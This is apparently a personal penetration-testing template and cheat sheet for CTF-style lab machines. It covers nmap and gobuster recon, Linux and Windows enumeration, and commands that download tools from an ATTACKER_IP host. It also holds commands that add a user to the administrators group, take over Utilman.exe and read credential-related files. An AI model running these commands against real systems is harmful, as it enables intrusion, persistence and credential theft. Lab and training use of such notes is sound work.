# 0xFF Report (Template) ``` ATTACKER_INTERFACE="tun0" TARGET_IP=10.10.165.130 ATTACKER_IP=$(ip addr show $ATTACKER_INTERFACE | awk '/inet / {print $2}' | cut -d '/' -f 1) ``` ## Reconnaissance **DNS Setting** Domain Name Check ```bash TARGET_DOMAIN='RetroWeb' nslookup $TARGET_DOMAIN ``` ```bash TARGET_DOMAIN='RetroWeb' echo "$TARGET_IP $TARGET_DOMAIN" >> /etc/hosts ``` ### Nmap-Scanning ```sh #/bin/sh echo " ################################################## # # # MeowHecker is a cat. ^O^ # # # ################################################## " echo HOST Discover; nmap -RP -PS -sn --reason -T4 $TARGET_IP; echo "----------------------------------------------------------------------------------------------------"; echo Scanning Default Port TARGET_OPEN_PORTS=$(nmap -sS -Pn -T4 $TARGET_IP | awk '/^ *[0-9]+\/(tcp|udp)/ {print $1}' | cut -d "/" -f 1 | paste -sd ","); echo Default(1000 - port):$TARGET_OPEN_PORTS; echo "----------------------------------------------------------------------------------------------------"; echo "Identifying Services & Operating System & NSE Scanning" nmap -sT -Pn -p $TARGET_OPEN_PORTS -sV -O -sC -T4 $TARGET_IP -oX ./$TARGET_IP.Xmap; #searchsploit --name $TARGET_IP.Xmap echo "----------------------------------------------------------------------------------------------------"; searchsploit --nmap $TARGET_IP.Xmap; sleep 10 echo "Starting Scanning 1024-10000" nmap -sS -p1024-10000 -T4 $TARGET_IP sleep 1 echo "Starting 10000~65535 Port Scanning in background"; nmap -sS -Pn -p10000-65535 -T4 $TARGET_IP -oN PortScan0~65535$TARGET_IP.nmap &; ``` **Identifying Services & Operating System & NSE Scanning** **Port Scanning (10000~65535)** ## Discovery & Analyzing Attack Surface ### Web #### Enumeration - Directory HTTP Website ```bash gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://$TARGET_IP -t 100 ``` HTTPS Website ```bash= gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://$TARGET_IP -t 100 -k ``` #### Enumeration - Sub Domain ```bash gobuster vhost -u http://$TARGET_DOMAIN -w /home/kali/Desktop/RedTools/wordlist/subdomains-top1million-5000.txt --append-domain -t 50 | grep Found | awk '{print $2}' > "$TARGET_DOMAIN-subDomain.txt" if [ -s "$TARGET_DOMAIN-subDomain.txt" ]; then echo "Found Target subdomain" sed -i "s/^/$TARGET_IP /" "$TARGET_DOMAIN-subDomain.txt" cat "$TARGET_DOMAIN-subDomain.txt" >> /etc/hosts echo "SubDomain added to /etc/hosts file." else echo "No subdomains found." fi ``` **Interesting things** - Check 127.0.0.1 Odd name ? User Credential ? login page ? Register page ? Upload Page ? Forget Password ? Site Map: Functionalities: #### Web Techniques Language:? Application Name & Version:? CMS Scan? #### Exists Known Vulnerabilities ? Check: Google? Exploit - DB? GitHub? ### Network Services - Port: #### Enumeration Name&Version: #### Exists Public Exploit? ## Identifying WebSite Vulnerabilities ### SiteMap & Dynamic Parameters. ### Testing **Checks** SQLI ? Local or Remote file include? File Upload ? Hide Parameters ? SSTI? API? XXE? SSRF? Website can be writable by network server? (NFS/SMB) ### Flawed Design ### Confirm Defense Mechanisms ### Bypass Defense Mechanisms - Bypass 1. Newline? 2. Path Traversal ? 3. Obfuscate? ## Exploitation ### Research & Vulnerabilities Chains ### Reverse Shell ## Post-Exploitation **Shell Stabilization** ### Privilege Escalation #### Enumeration #### Exploit --- # [Active Recon](/jZSjYlEESIWbdjKtVTfDAg) # [Web penetration](/HeqpRWIdTiuZ0IzLr2oDlA) # [Network Service penetration](/FyQUFaZYRKyLSwYhTAvALg) # [Remote Brute Force Login](/ngZz3rf5QMyfW_8cIGJHKw) # [Password/HASH/Encoder](/y7G9q6TBRmCujlS92M8VTQ) # [Lateral Movement & Reverse Shell](/vyVONxxDSS-v8IQf5NLLwA) # [Linux Privilege Escalation - cheat Sheet](/bacm0UUcSQa-wD1Yw-J9MA) # [Windows Privilege Escalation - cheat Sheet](/F1Ec_YkdTo20hkQYnjRSAw) # [Active Directory - Cheat Sheet](/dyb7O0UFTW6tVtIubN8YVw) # [Metasploit - Cheat Sheet](/DLNUVZmGQ02itjSd3AUppQ) # Linux Command ## $PATH ENV ``` echo $PATH | tr ':' '\n' ``` ``` export PAHT=/tmp:$PATH ``` ## Search ### Specific file ``` find / -name flag1.txt 2>/dev/null ``` find / -name flag2.txt ### Writable Folder ``` find / -writable 2>/dev/null | cut -d "/" -f 2 | sort -u ``` ``` find / -writable 2>/dev/null | cut -d "/" -f 2,3 | grep SPECIFICE_FOLDER | sort -u ``` find / -writable 2>/dev/null | cut -d "/" -f 2,3 | grep home | sort -u ## Download files ``` wget $ATTACKER_IP/BINARY -O /tmp/BINARY ``` ## Network Cmd Display Socket information ``` ss -tulpn ``` ## Temporary WebServer ``` sudo python3 -m http.server 80 ``` ## File Transmission ``` scp FILE_A VICTIM_USER@VICTEM_IP:/tmp ``` ## Obtain User List ``` cat /etc/passwd | cut -d ":" -f 1 ``` Work Filter systems account ``` cat /etc/passwd | grep home | cut -d ":" -f 1 ``` # Customized tools ## Compare Output with wordlist https://github.com/Meowheckerrr/LinuxPrivilege/blob/main/Danger%20Binary%20Permission/Compare.py # Windows Command ## System information ``` systeminfo ``` ## Impotant Path ### USER Desktop ``` cd C:/Users/<USER_NAME>/Desktop ``` cd C:/Users/Administrator/Desktop ### SAM Path ``` cd C:\Windows\System32\config ``` ## Serach files CMD ``` powershell -c "Get-ChildItem -Path C:\ -Filter "flag*" -Recurse -ErrorAction SilentlyContinue" ``` Powershell ``` Get-ChildItem -Path C:\ -Filter "flag*" -Recurse -ErrorAction SilentlyContinue ``` Work Don't show error message ## Windows Temp dir (R/W) cmd.exe ``` cd C:\WINDOWS\Temp ``` ## Listing Installed software /name/version/vendor ``` wmic product get name,version,vendor ``` Notice wmic product command may not return all installed programs (it might take around a minute to finish): ## Service ### Listing ALL services cmd ``` sc query state=all ``` powershell ``` Get-Service ``` ### Start/Stop the service cmd.exe /Powershell ``` sc.exe stop SERVIC_NAME sc.exe start SERVIC_NAME ``` sc.exe stop windowsscheduler sc.exe start windowsscheduler ### Checking Service statue & Name cmd ``` powershell -c "Get-Service -Name WinRM" ``` Powershell ``` Get-Service -Name SERVICE_NAME ``` Get-Service -Name WinRM ### Checking service permission Tools Download:https://download.sysinternals.com/files/AccessChk.zip first run of this program. we have to add "-accepteula" options ``` accesschk64.exe -qlc SERVICE_NAME -accepteula ``` ### Checking Service configuraiton Powershell -> Must use sc.exe to query ! cmd.exe ``` sc query state= all sc qc SERVICE_NAME ``` ## Print File contant cmd.exe ``` type FILE_PATH ``` ## Scheduled Task cmd.exe ``` schtasks schtasks /query /tn TASK_NAME /fo list /v ``` ``` schtasks /run /tn TASK_NAME ``` ## Binary Permission ### Check Binary Permission cmd.exe ``` icacls FILE_PATH ``` icacls C:\Windows\System32\Utilman.exe icacls c:\windows\system32\inetsrv\ ### Modify Binary Permission ``` icacls C:\PATH\TO\BINARY.exe /grant USER_NAME:F ``` icacls C:\Windows\System32\Utilman.exe /grant THMTakeOwnership:F ## Powershell History cmd.exe ``` type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt ``` Powershell ``` type $Env:userprofile\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt ``` ## Add New user & add User into ADMIN group cmd.exe ``` net user USER_NAME USER_PASS /add net localgroup administrators USER_NAME /add ``` ## Download files cmd ``` powershell -c "wget 10.4.42.63:8000/RogueWinRM.exe ./RogueWinRM.exe" ``` Powershell (Great) ``` Invoke-WebRequest -uri MACHINE-IP/BINARY_FILE.exe -outfile C:\\Windows\temp\BINARY_FILE.exe ``` Powershelll (old) ``` powershell "(New-Object System.Net.WebClient).Downloadfile('http://ATTACKER:53/PowerUp.ps1','PowerUp.ps1')" ``` powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.4.42.63:53/PowerUp.ps1','PowerUp.ps1')" Powershell(Normal) ``` wget <OUR_MACHINE-IP>/BINARY -O /tmp/BINARY ``` wget 10.4.42.63/RogueWinRM.exe -O ./RogueWinRM.exe if not work try Invoke-WebRequest # Public Exploit DB packetstorm https://packetstormsecurity.com/search/?q=exploit exploit-db https://www.exploit-db.com/ Rapid7 https://www.rapid7.com/db/ GIT Hub https://github.com/search?q=POC&ref=simplesearch NVD https://nvd.nist.gov/vuln/full-listing OSINT https://haveibeenpwned.com/ https://www.dehashed.com/ https://search.censys.io/ <!-- Enumerate [Nmap](/IQ0X0dEjQb2MlYNWltGiyQ) Check permission [AccessChk](/eG8iTjXCRimYh0Hh1UEcxQ) Vulnerability scanner [Nessus](/g7wmgc2HSeaLxr7CjtMu-g) PWN [spike](/vbjUdZ9uSA2mEdCCgLQCiw) [mona](/4foU8SD3R661QFbsRx9dPQ) web [dirb](/WXEOmjh3TLeB5-5-H8woNQ) [Gobuster](/vG5G0iawSNC6lcXunlkTwA) [Brup suite](/OG8mjGXHSqO322yVFchh_A) [curl ](/-0FzNAw3SuqKTExRcKpLZA) [sqlmap](/xFicQsJkQOK6dv2uvLycIQ) [msfvenom](/ByWq5dNSQe6T_wHkTutV-g) [Metasploit](/ZW0_1qSTSJ2dCxA-XtAZmw) USB [Hak5](/jIA0ERyJRDKX9vJwKlq4XQ) MITM(Man in the middle attack) >[responder](/Uq2Bd8I3THKo7TzgEOOSiQ) LLMNR, NBT-NS and MDNS poisoner HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2 Capture packet [tcpdump](/kfifQDlrRCCKhDLpB47RbQ) [wireshark](/eIhUKz8GQhq14lgoJJv1Xg) Decryption (local) [john](/kt8t2zU4Shqc9OUVZywoIw) [Hashcat](/1_bS2IjFSmuMbhWA98szbA) (Remote) Service password Crack McAfee McAfee is Anti-virus software Decryption -> ma.db(Configure file) -> Agent_repository-> Password Tools Develop [netcat](/cf6LLDnNRCGAF9C9rdgnRw) [Cheat sheet (web links)](/QNXBbZJgSImS28EKbjs5Sw) --> Reference - https://book.hacktricks.xyz/network-services-pentesting/pentesting-web#web-tech-tricks ``` Owner:侯智晟 meowheckerouo@gmail.com ```